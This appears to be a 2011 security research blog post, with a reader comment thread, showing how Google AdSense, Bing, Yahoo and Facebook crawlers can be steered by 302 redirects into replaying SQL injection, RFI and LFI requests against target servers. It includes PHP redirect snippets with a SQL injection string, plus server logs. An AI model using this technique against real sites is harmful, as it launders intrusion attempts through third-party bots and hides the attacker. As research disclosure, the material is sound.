Bots Command & Conquer

Some months ago, I was interested by suspicious alerts, generated on our Honey Net, how are related to the dedicated Google AdSense “Mediapartners-Google*” bot.
Mediapartners bot, as I understand, is working with the Google cache, so, when a new web page, or an existing web page, using the AdSense javascript code, is called by a visitor, and is no not contained in the Google cache, the Mediapartners bot will fetch the web page.

If the web page how has been invoked, first by the visitor, contain SQL injection, RFI, LFI or XSS URL parameters, Mediapartners bot will replay the attack. So if you are vulnerable to theses web attacks, you will get owned first by the visitor how has invoke the vulnerable URL, then by Mediapartners bot how will copycat the visitor action. I tested with SQL injections and RFI vulnerabilities, my lab was all the time owned, in a second time, by the Mediapartners bot.

This bot behavior, is interesting, cause you could need a web attack how require two sequences, the first sequence will be made by the visitor call, then the second action by the bot. For example, on a RFI vulnerability (, the visitor first call, will execute the “id.txt” code, and directly after the code execution the original id.txt code could be automatically replaced by a different code, how will be then called by the Mediapartners copycat bot.

Mediapartners bot is not a “classical” search engine bot. “Classical” search engine bot will visit your website depending the popularity of your website, and surely others criteria, so you don’t have any control on when they will come visit you. In 2001, lcamtuf (aka Michal Zalewski) has publish a Phrack “Rise of the Robots” article how demonstrate that classical search engine, with them natural “link follow” behavior, could also participate to hack vulnerable websites. Just create a web page with thousands of SQL injections, or RFI, web links, the search engine bot will follow the links and execute the web attacks. This technique is known as “link spam“. But as described by lcamtuf you don’t have the control on the bot visit timeline.

With the Mediapartners bot, we have the control on the timing, cause you know the triggers how are calling the bot. You need to have a valid AdSense account, the AdSense javascript in your web page, and the web page shouldn’t not be in the Google cache. Quiet easy to on demand invoke the bot, create random web pages, with all the pre-requirements and the job will be done. Bot invocation on demand.

But you still have a trouble, you have to reveal your source IP, by the first web page invocation, the attack is not transparent.

“Classical” search engine bots have interesting features, for example the could react the 301 or 302 HTTP redirection. So you could redirect, certain bots, where you want. Just take a look at the following code, and replace “Bots“, with a bot fingerprint :

$br = get_browser($_REQUEST['HTTP_USER_AGENT'], true);
$a = $br['browser'];

#$URL = "";
#$URL = "'%20OR%20'a'='a";
$URL = "";

if(preg_match('/Bots/i',$a)) {
      header("Location: $URL");

I have test the 302 redirection with the most common search engine bots, and have see that most of them are “vulnerable”.

  • msnbot-media

C&C server – – [14/Jan/2011:21:56:38 +0100] “GET /random_url.php HTTP/1.1” 302 236957 “-” “msnbot-media/1.1 (+”

Target server – – [14/Jan/2011:21:56:40 +0100] “GET /robots.txt HTTP/1.1” 200 74 “-” “msnbot-media/1.1 (+” – – [14/Jan/2011:21:56:41 +0100] “GET / HTTP/1.1” 200 15146 “-” “msnbot-media/1.1 (+”

  • bingbot

C&C server – – [14/Jan/2011:22:34:49 +0100] “GET /random_url.php HTTP/1.1” 302 19847 “-” “Mozilla/5.0 (compatible; bingbot/2.0; +”

Target server – – [14/Jan/2011:22:34:50 +0100] “GET /robots.txt HTTP/1.1” 200 74 “-” “Mozilla/5.0 (compatible; bingbot/2.0; +” – – [14/Jan/2011:22:34:51 +0100] “GET / HTTP/1.1” 200 15146 “-” “Mozilla/5.0 (compatible; bingbot/2.0; +”

  • Yahoo! Slurp – – [16/Jan/2011:09:08:55 +0100] “GET /random_url.php HTTP/1.0” 302 – “-” “Mozilla/5.0 (compatible; Yahoo! Slurp;”

  • Googlebot-Image – – [14/Jan/2011:22:09:02 +0100] “GET /random_url.php HTTP/1.1” 302 71861 “-” “Googlebot-Image/1.0”

All the time, the bots have execute the web attacks, and they was the only source IP of the attack, they’re is no need to directly to reveal yourself for web hacking, the search engine bots will do the job for you. But as I explained, you don’t have any control on the bot invocation.

After some searches I discovered that Mediapartners bot is also vulnerable to the 302 redirection. So you know how to call the bot, and you have control on him by redirecting him where you want.

Some random text
<script type="text/javascript"><!--
google_ad_client = "pub-xxxxxxxxxxxxxxxxx";
google_ad_slot = "1169124694";
google_ad_width = 300;
google_ad_height = 250;
<script type="text/javascript"
$br = get_browser($_REQUEST['HTTP_USER_AGENT'], true);
$a = $br['browser'];
#$URL = "";
#$URL = "'%20OR%20'a'='a";
$URL = "";
if(preg_match('/Mediapartners/i',$a)) {
      header("Location: $URL");

Here under the result. I still have to first invoke the bot, but then the bot will be redirected to the target URL, hiding my source IP.

C&C server – – [13/Jan/2011:00:27:40 +0100] “GET /random_URL.php HTTP/1.1” 200 1290 “-” “Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.231 Safari/534.10” – – [13/Jan/2011:00:27:42 +0100] “GET /random_URL.php HTTP/1.1” 302 1288 “-” “Mediapartners-Google”

Target server – – [13/Jan/2011:00:27:42 +0100] “GET / HTTP/1.1” 200 15146 “-” “Mediapartners-Google”

What is interesting to see is that the Mediapartners bot source IP on the C&C server is not the same than the source IP on the target server. The Mediapartners bots are sharing orders between different source servers.

I have now a fully controllable bot, time and target are customizable. It is quiet simple to create a C&C back-end how will generate random on demand web pages, and do the invocation of the bot. After more tests Mediapartners bot is not only supporting HTTP or HTTPS protocol, but also FTP. – – [15/Jan/2011:00:19:26 +0100] “GET /random_URL.php HTTP/1.1” 302 91754 “-” “Mediapartners-Google”

root@xxxxx ~]# tcpdump -n port 21
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), capture size 96 bytes

00:19:27.956865 IP > S 1218834134:1218834134(0) win 5840
00:19:27.956983 IP > S 2218131910:2218131910(0) ack 1218834135 win 5792
00:19:27.972538 IP > . ack 1 win 92
00:19:27.973972 IP > P 1:266(265) ack 1 win 91
00:19:27.989653 IP > . ack 266 win 108
00:19:27.989864 IP > P 1:17(16) ack 266 win 108
00:19:27.989894 IP > . ack 17 win 91
00:19:27.990238 IP > F 266:266(0) ack 17 win 91
00:19:28.005937 IP > F 17:17(0) ack 267 win 108
00:19:28.005975 IP > . ack 18 win 91

Is Mediapartners bot the only bot how is fully controllable ? No 🙂 Another example is the Facebook “facebookexternalhit” bot. Here under the description of the bot :

“Facebook allows its users to send links to interesting web content to other Facebook users. Part of how this works on the Facebook system involves the temporary display of certain images or details related to the web content, such as the title of the webpage or the embed tag of a video. Our system retrieves this information only after a user provides us with a link.”

When you publish an URL on your Facebook wall status, “facebookexternalhit” bot will fetch the URL and cache the content for later delivery. So, you have control on the bot invocation. Facebook has some security mechanisms how don’t permit you to publish a link on your wall containing SQL injection, RFI, LFI or XSS in parameters.

But “facebookexternalhit” bot is also vulnerable to 302 redirection, so permitting you to trick the security mechanism.

C&C server – – [14/Jan/2011:22:40:57 +0100] “GET /random_URL.php HTTP/1.1” 302 65629 “-” “facebookexternalhit/1.1 (+”

Target server – – [14/Jan/2011:22:40:58 +0100] “GET / HTTP/1.1” 200 9545 “-” “facebookexternalhit/1.1 (+”

Just publish a “normal” link on you Facebook status, the bot will fetch the page and will be directly redirected, for example, on a SQL injection URL. What is funny, is that the result of the web attack will be displayed on your wall 🙂

Result of a 302 SQL injection in the title HTML tag
Result of a LFI web attack on a targeted server after 302 redirection

A lot of bots are vulnerable to different attack, you never see them, but take care of them. I would like to thanks jduck from Metasploit Team, providing me some useful informations.

2 thoughts on “Bots Command & Conquer

  1. Hello Amichai,

    Thanks for your comment. Nice presentation on Google MediaPartners bot !

    On the point “Use MediaBot to launch an attack that does not require ƒserver response”,
    you could have server response with RFI attack initiated by Google bot, and continue the attack as you want.

    “Blindfolded Google SQL Injection” chapter, with Disney characters, is realy interesting 🙂

    Did you also have extend your research on other bots ?
    Actually I have find, as described in my blogpost, that Facebook bot is also fully controllable.

    I’m testing to find other controllable bots.

    One more time, thanks for the reference.


Comments are closed.